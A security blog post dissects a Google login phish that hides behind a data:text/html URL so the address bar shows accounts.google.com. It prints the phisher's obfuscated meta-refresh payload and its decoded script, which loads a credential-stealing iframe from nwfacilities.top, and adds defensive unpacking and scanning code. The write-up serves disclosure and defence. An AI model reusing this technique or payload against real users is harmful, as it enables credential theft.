Phishing Via JavaScript Google This Time Not PayPal

Phishing

Following on from this post, which gained lots of attention, I have been told about a new one today. This one fulfils our worst fears: the entire phish is performed on a page whose address bar contains the genuine Google login URL, https://accounts.google.com/ServiceLogin, and it really makes you believe that you are entering your Google credentials only on the genuine Google page, but in fact you are sending your details to the phisher from a page the phisher controls.

There is no way on this earth that any normal person could know that the Google short URL link did not lead to a genuine Google login page.

I haven't seen an email, so I have no idea what the original email looked like, but the link was to a Google short URL, http://goo.gl/NL4EmV, which according to the Google short URL service (if you put a + after a goo.gl URL, you get a Google page with the stats and destination) redirects to http://zg.al/Z46Qd, where I couldn't get any further using either IE or Chrome. I just ended up on what looked like, and actually is, the genuine Google account page. I used Firefox with NoScript, where this trick doesn't work, and ended up on http://nwfacilities.top/aboutus/benionshesre.htm, where we get this set of instructions by using view source.

Update: shortly after publishing this post and reporting http://goo.gl/NL4EmV to Google, they removed that short URL redirect. However, the nwfacilities page is still active and live, and it will be trivial for the phisher to create other short URLs on goo.gl and malspam them out.
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue<script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2UoYyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnMy4yLmo9ImkgaCBrIGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsxLmM9XCdcJzsyLnAoXCdCXCcpWzBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjovL3EudC91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHxyZWx8c2hvcnRjdXR8aHJlZnxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxiZWVufFNpZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfG53ZmFjaWxpdGllc3xodHRwfHNyY3x0b3B8YWJvdXR1c3xodG1sfHJlY2tpb3JlbnN8fG91dGVySFRNTHxib2R5fHdpZHRofGhlYWR8YXBwZW5kQ2hpbGR8Ym9yZGVyfGNhdGNoJy5zcGxpdCgnfCcpLDAse30pKQ==></script>">
So you can see from that the redirect target is not https://accounts.google.com/ServiceLogin at all: it is a data:text/html URL whose HTML body simply begins with that Google address as plain text, which is why the address bar appears to show the genuine Google login page. The sting is in the script tag appended to that text, whose base64-encoded source decodes to
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.2.j="i h k l n";m{(g(){f 1=3.2.9(\'1\');1.8=\'7/x-4\';1.a=\'b 4\';1.c=\'\';2.p(\'B\')[0].C(1)}())}E(e){}3.2.z.y="<6 s=\\"r://q.t/u/w.v\\" o=\\"D: 0;A: 5%;d:5%\\"></6>";',41,41,'|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|nwfacilities|http|src|top|aboutus|html|reckiorens||outerHTML|body|width|head|appendChild|border|catch'.split('|'),0,{}))
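The packed script above can be read without running it. What follows is an added example, not code from the original post or from the phisher's page: it re-implements the substitution step of this packer (the familiar eval(function(p,a,c,k,e,d){...}) wrapper) so the real script can be recovered without ever calling eval. The packed source, the radix 41 and the word list are copied verbatim from the decoded text above; the helper names are my own.

```javascript
// Added example, not code from the original post: a static unpacker for the
// "p,a,c,k,e,d" format used by the phishing script above. It reproduces the
// wrapper's own substitution loop but never calls eval, so the attacker's
// payload is read without being executed.

// The packer arguments, copied from the base64-decoded script on the page:
// p = packed source, a = radix 41, k = word list (c = 41 is just k.length).
const PACKED_P = '3.2.j="i h k l n";m{(g(){f 1=3.2.9(\'1\');1.8=\'7/x-4\';1.a=\'b 4\';1.c=\'\';2.p(\'B\')[0].C(1)}())}E(e){}3.2.z.y="<6 s=\\"r://q.t/u/w.v\\" o=\\"D: 0;A: 5%;d:5%\\"></6>";';
const PACKED_RADIX = 41;
const PACKED_WORDS = '|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|nwfacilities|http|src|top|aboutus|html|reckiorens||outerHTML|body|width|head|appendChild|border|catch'.split('|');

// The wrapper's "e" function: word index -> token written in base `radix`,
// where digits 0..35 are 0-9a-z and digits 36..40 are the capitals A..E.
function packerToken(index, radix) {
  const head = index < radix ? '' : packerToken(Math.floor(index / radix), radix);
  const digit = index % radix;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuild the token -> word dictionary and substitute every \w+ token, exactly
// as the wrapper does. Empty word-list entries (e.g. index 14, "e") map to themselves.
function unpack(packed, radix, words) {
  const dict = new Map();
  for (let i = 0; i < words.length; i++) {
    const tok = packerToken(i, radix);
    dict.set(tok, words[i] || tok);
  }
  return packed.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

function unpackPhishPayload() {
  return unpack(PACKED_P, PACKED_RADIX, PACKED_WORDS);
}

// Pull the iframe target out of the recovered source. The unpacked code writes
// the iframe tag inside a JS string, so its quotes appear as \" in the source.
function extractIframeSrc(source) {
  const m = source.match(/<iframe src=\\"([^"\\]+)\\"/);
  return m ? m[1] : null;
}

console.log(unpackPhishPayload());
console.log('iframe loads:', extractIframeSrc(unpackPhishPayload()));
```

Running it prints the real script: it sets the page title to "You have been Signed out", appends an empty favicon link to the head (inside a try/catch), and then replaces document.body.outerHTML with a border-less, 100% wide and high iframe pointing at http://nwfacilities.top/aboutus/reckiorens.html. Nothing in it ever contacts accounts.google.com.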

What this basically does is replace the entire body of that data: document with a full-window iframe (no border, 100% width and height) loading http://nwfacilities.top/aboutus/reckiorens.html, after setting the page title to "You have been Signed out" and adding an empty favicon link. The genuine Google page is never loaded at all; https://accounts.google.com/ServiceLogin is just the first thing in the data: URL's text, which is why it is what the address bar shows. The iframe holds the phisher's copy of the Google login, which you see as http://nwfacilities.top/aboutus/reckiorens.html#identifier. On pressing the submit button you are forwarded to http://nwfacilities.top/aboutus/reckiorens.html#password while your details are sent to http://nwfacilities.top/aboutus/1.php, which only works if the request comes via reckiorens.html and otherwise returns a 403 Forbidden error. All the time https://accounts.google.com/ServiceLogin appears in the URL bar of the browser, making you convinced that you are actually on the genuine Google site.

This is what you see: a page that looks exactly like the genuine Google login, but it is the http://nwfacilities.top copy inside the hidden iframe, with the phisher's JavaScript still loaded and performing all the nefarious actions and stealing your information. The only visible difference between going to the Google login page yourself and this one is the text data:text/html, at the start of the URL, and that is the difference that matters: a data: URL is a page the browser builds from the link itself, with an opaque origin and no involvement from Google whatsoever.
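Here is what a link or mail scanner should conclude from the meta refresh shown above. This is an added example, not code from the original post: it takes the content attribute of the refresh tag, works out the scheme and origin the browser will actually navigate to and, for a data: URL, decodes the inline HTML to show that the Google address is page text while the real behaviour sits in an embedded script. The sample input is constructed in the same shape as the page's meta refresh, with a short stand-in payload in place of the full packed script; the function names are my own.

```javascript
// Added example, not code from the original post: analyse a <meta refresh>
// target the way a link scanner should, without following it in a browser.

// Constructed sample in the shape of the page's meta refresh. The stand-in
// payload does the one thing the real one does: swap the body for an iframe.
const FAKE_PAYLOAD_JS =
  'document.body.outerHTML=\'<iframe src="http://nwfacilities.top/aboutus/reckiorens.html"></iframe>\';';
const SAMPLE_META_CONTENT =
  '0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue' +
  '<script src=data:text/html;base64,' + Buffer.from(FAKE_PAYLOAD_JS, 'utf8').toString('base64') + '></script>';

// Split "data:[<mediatype>][;base64],<data>" into its parts and decode the body.
function parseDataUrl(url) {
  const m = url.match(/^data:([^,]*),([\s\S]*)$/i);
  if (!m) return null;
  const params = m[1].split(';');
  const isBase64 = params[params.length - 1].toLowerCase() === 'base64';
  const mediaType = params[0] || 'text/plain';
  let body;
  if (isBase64) {
    body = Buffer.from(m[2], 'base64').toString('utf8');
  } else {
    try { body = decodeURIComponent(m[2]); } catch (e) { body = m[2]; }
  }
  return { mediaType, isBase64, body };
}

// Returns the real navigation target, its scheme and origin, and for a data:
// URL the URL-looking text at the start of the body plus every embedded script.
function analyzeRefreshTarget(metaContent) {
  const urlMatch = metaContent.match(/url\s*=\s*([\s\S]*)$/i);
  if (!urlMatch) return { target: null, scheme: null, origin: null, embeddedScripts: [] };
  const target = urlMatch[1].trim();
  const schemeMatch = target.match(/^([a-z][a-z0-9+.-]*):/i);
  const scheme = schemeMatch ? schemeMatch[1].toLowerCase() : null;

  if (scheme !== 'data') {
    // An http(s) target has a real origin; that is what the browser would talk to.
    return { target, scheme, origin: new URL(target).origin, embeddedScripts: [] };
  }

  const doc = parseDataUrl(target);
  // A data: document has an opaque origin, reported as "null". Whatever the
  // body says, none of it was served by the host named in that text.
  const visibleMatch = doc.body.match(/^https?:\/\/[^\s<]+/);
  const embeddedScripts = [];
  for (const s of doc.body.matchAll(/<script\s+src=["']?([^\s"'>]+)/gi)) {
    const inner = parseDataUrl(s[1]);            // nested data: URL carrying the script
    embeddedScripts.push({
      src: s[1].slice(0, 40) + (s[1].length > 40 ? '...' : ''),
      code: inner ? inner.body : null,
    });
  }
  return {
    target, scheme, origin: 'null', mediaType: doc.mediaType,
    visibleUrlText: visibleMatch ? visibleMatch[0] : null,
    embeddedScripts,
  };
}

console.log(JSON.stringify(analyzeRefreshTarget(SAMPLE_META_CONTENT), null, 2));
console.log(analyzeRefreshTarget('0; url=https://accounts.google.com/ServiceLogin?service=mail').origin);
```

For the phishing refresh the verdict is scheme "data", origin "null", visible text "https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue" and one embedded script whose decoded code installs the iframe; for a genuine refresh to the Google URL the origin is "https://accounts.google.com". A scanner should treat any data:text/html navigation target that carries an embedded script, or whose body starts with a URL for a well-known login host, as a phish.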

This only appears to work in Google Chrome, because Internet Explorer gives this message and will not navigate to a data:text/html URL (thankfully). Firefox just gives a blank page until you use the view source option.

I have just found this Wikipedia entry that says:

Malware and phishing

The data URI can be utilized by criminals to construct attack pages that attempt to obtain usernames and passwords from unsuspecting web users. It can also be used to get around site cross-scripting restrictions, embedding the attack payload fully inside the address bar, and hosted via URL shortening services rather than needing a full website that is owned by the criminal.

So it is known about, although I have never previously seen it used. A link from Wikipedia gave me https://nakedsecurity.sophos.com/2012/08/31/phishing-without-a-webpage-researcher-reveals-how-a-link-itself-can-be-malicious/, which describes a similar type of attack.
